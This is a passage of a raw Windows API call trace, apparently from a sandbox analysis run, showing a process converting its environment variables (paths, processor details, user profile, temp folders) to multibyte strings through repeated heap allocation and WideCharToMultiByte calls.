lpUsedDefaultChar=0x0) returned 37 [0131.207] GetLastError () returned 0x0 [0131.207] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x28 [0131.207] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x2c) returned 0x703238 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0131.207] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x39) returned 0x6f6c20 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6f6c20, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0131.207] GetLastError () returned 0x0 [0131.207] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703238) returned 0x2c [0131.207] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703238, Size=0x30) returned 0x703238 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.207] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6f7b58 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6f7b58, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0131.207] GetLastError () returned 0x0 [0131.207] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703238) returned 0x30 [0131.207] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703238, Size=0x34) returned 0x703238 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.207] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x17) returned 0x6f7b78 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6f7b78, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0131.208] GetLastError () returned 0x0 [0131.208] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703238) returned 0x34 [0131.208] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703238, Size=0x38) returned 0x703238 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.208] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xe) returned 0x700c80 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x700c80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0131.208] GetLastError () returned 0x0 [0131.208] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703238) returned 0x38 [0131.208] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703238, Size=0x3c) returned 0x703238 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0131.208] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x69) returned 0x703280 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x703280, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0131.208] GetLastError () returned 0x0 [0131.208] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703238) returned 0x3c [0131.208] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703238, Size=0x40) returned 0x703238 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0131.208] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3e) returned 0x6f6c68 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x6f6c68, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0131.208] GetLastError () returned 0x0 [0131.208] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703238) returned 0x40 [0131.208] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703238, Size=0x44) returned 0x7032f8 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.208] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1b) returned 0x701540 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x701540, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0131.208] GetLastError () returned 0x0 [0131.208] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x44 [0131.208] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x48) returned 0x7032f8 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0131.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1d) returned 0x701568 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x701568, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0131.209] GetLastError () returned 0x0 [0131.209] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x48 [0131.209] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x4c) returned 0x7032f8 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0131.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x48) returned 0x6f9368 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x6f9368, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0131.209] GetLastError () returned 0x0 [0131.209] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x4c [0131.209] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x50) returned 0x7032f8 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0131.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x12) returned 0x6f7b98 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6f7b98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0131.209] GetLastError () returned 0x0 [0131.209] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x50 [0131.209] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x54) returned 0x7032f8 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6f7bb8 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x6f7bb8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0131.209] GetLastError () returned 0x0 [0131.209] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x54 [0131.209] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x58) returned 0x7032f8 [0131.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1b) returned 0x701590 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x701590, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0131.210] GetLastError () returned 0x0 [0131.210] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x58 [0131.210] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x5c) returned 0x7032f8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0131.210] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x24) returned 0x6fd070 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x6fd070, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0131.210] GetLastError () returned 0x0 [0131.210] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x5c [0131.210] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x60) returned 0x7032f8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0131.210] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x29) returned 0x6fd7a0 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x6fd7a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0131.210] GetLastError () returned 0x0 [0131.210] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x60 [0131.210] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x64) returned 0x7032f8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0131.210] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1e) returned 0x7015b8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x7015b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0131.210] GetLastError () returned 0x0 [0131.210] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x64 [0131.210] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x68) returned 0x7032f8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0131.210] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x41) returned 0x6f93b8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x6f93b8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0131.210] GetLastError () returned 0x0 [0131.210] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x68 [0131.210] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x6c) returned 0x7032f8 [0131.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.210] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x17) returned 0x6f7bd8 [0131.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x6f7bd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0131.211] GetLastError () returned 0x0 [0131.211] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x6c [0131.211] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x70) returned 0x7032f8 [0131.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.211] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x14) returned 0x6f7bf8 [0131.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x6f7bf8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0131.211] GetLastError () returned 0x0 [0131.211] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x70 [0131.211] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x74) returned 0x7032f8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0131.212] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xf) returned 0x700c98 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x700c98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0131.212] GetLastError () returned 0x0 [0131.212] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x74 [0131.212] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x78) returned 0x7032f8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.212] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x16) returned 0x6f7c18 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6f7c18, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0131.212] GetLastError () returned 0x0 [0131.212] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x78 [0131.212] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x7c) returned 0x7032f8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0131.212] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2a) returned 0x6fd7d8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x6fd7d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0131.212] GetLastError () returned 0x0 [0131.212] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x7c [0131.212] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x80) returned 0x7032f8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0131.212] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x29) returned 0x6fd810 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x6fd810, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0131.212] GetLastError () returned 0x0 [0131.212] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x80 [0131.212] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x84) returned 0x7032f8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.212] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x15) returned 0x6f7c38 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6f7c38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0131.212] GetLastError () returned 0x0 [0131.212] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x84 [0131.212] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x88) returned 0x7032f8 [0131.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0131.212] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1e) returned 0x703fd0 [0131.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x703fd0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0131.265] GetLastError () returned 0x0 [0131.265] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x88 [0131.265] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x8c) returned 0x7032f8 [0131.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0131.265] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2a) returned 0x6fd848 [0131.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x6fd848, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0131.265] GetLastError () returned 0x0 [0131.265] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x7032f8) returned 0x8c [0131.265] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x7032f8, Size=0x90) returned 0x7032f8 [0131.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0131.265] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x12) returned 0x6f7c58 [0131.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6f7c58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0131.265] GetLastError () returned 